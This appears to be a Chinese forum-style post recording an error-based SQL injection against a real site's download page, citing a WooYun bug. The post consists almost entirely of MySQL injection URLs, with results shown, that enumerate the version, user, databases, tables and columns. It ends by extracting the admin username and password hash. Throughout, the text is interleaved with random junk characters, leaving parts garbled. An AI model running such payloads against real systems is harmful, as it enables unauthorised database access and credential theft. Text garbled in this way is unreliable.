http://www.wooyun.org/bugs/wooyun-2010-01666% g3 j0 W4 s" M; U
" U: w" C6 ]3 W- M* w. X4 D5 I之前想找个测试 没想到这有 可以测试下做个记录而已 1 P, o" c5 U# B0 O
: T A! x! ~% `) a8 s, Hhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
% Y+ H/ d2 T% l2 I2 x1 P0 ^$ R6 p( ]: j! ^ z/ v. o
/data0/htdocs/leqi_new/app/myapp.php% a3 V$ g) A. n7 v; a3 w
4 V$ I" C) d; y F0 ]
或者7 e0 L/ v* I4 N+ ?- Q* _7 A
& M8 l: d K4 C( T$ E |
/**********version()**********/ 5.1.49-log. b1 m- _3 [+ @1 D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 }7 N; C/ `0 e4 ]/ C8 F+ h
! [# B6 c: L/ I6 m5 D c/**********user()**********/ : o- A; s! U3 A$ b# y- O( b# ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# |* R5 f3 G9 `
" ~( j6 g# d' `! d7 T+ d0 M- t3 `
/**********database()**********/ leqi
- S) g0 J: z8 f; L; |6 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 l4 D* U7 L- `, q4 f. r
; B( d% `9 c. s$ u' t8 z/**********limit依次递归爆库**********/
& G$ i' G4 ]# H6 s) `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( Q* n! G ^" L) Xinformation_schema
" j/ I: [4 }! C) whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. d. |& ~4 n' d& f
leqi6 H6 R, h0 h! M( F! n2 Y3 |+ f
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 J6 Q8 w' a2 D9 v( r* c& H1 Z+ Y: Gtest
$ _" i! z7 c2 Q7 i1 ^) z9 U U/ r( a2 U; O' b- e2 \
/**********limit依次递归爆表名**********/
, i4 V0 K- A2 n4 r- X" mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' Q4 T6 d! l5 y4 ~. Y* s" Y
users
4 z3 D1 M8 Y% ?, b. l8 b* J. k9 ] q( z+ E$ W0 n% G
/**********limit依次递归爆字段名**********/
7 N+ B8 |& f3 D& Z( k9 ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' t; K( Z; ?+ d1 _1 vuser_id,username,nickname,passwd,group_id9 R, B3 W5 Y% N. P/ k) w# c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, O7 J# F7 ]- c, g' ]3 S/wapc/5000_0005_0038 F/ I6 x9 v$ {, V
11 21/ w# d; |; q* ]8 b! J2 O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! t+ j& U4 }8 g$ p4 v5 m* q; S0 E/wapc/5000_0005_0036 b' J* y I0 E3 M" ?! k+ f
11 341 351 3619 M. P2 V& n; g* z- Y/ i1 l$ E, H
/**********爆数据**********/0 T/ h1 Y5 }& v/ U4 X2 L" v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23# L* `% S( q4 c& w2 x) p6 U
admin* f, V* w" I g- s$ D9 C) J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%234 [2 v4 l2 z* A; S3 P4 B, W+ g
6a8b4574ca231eb8bd52764d4978ffcd
$ Y: Z9 e" V" F) V5 Z( D' F k6 m B+ b( j1 t
# |6 j4 Q: I) A; t* p |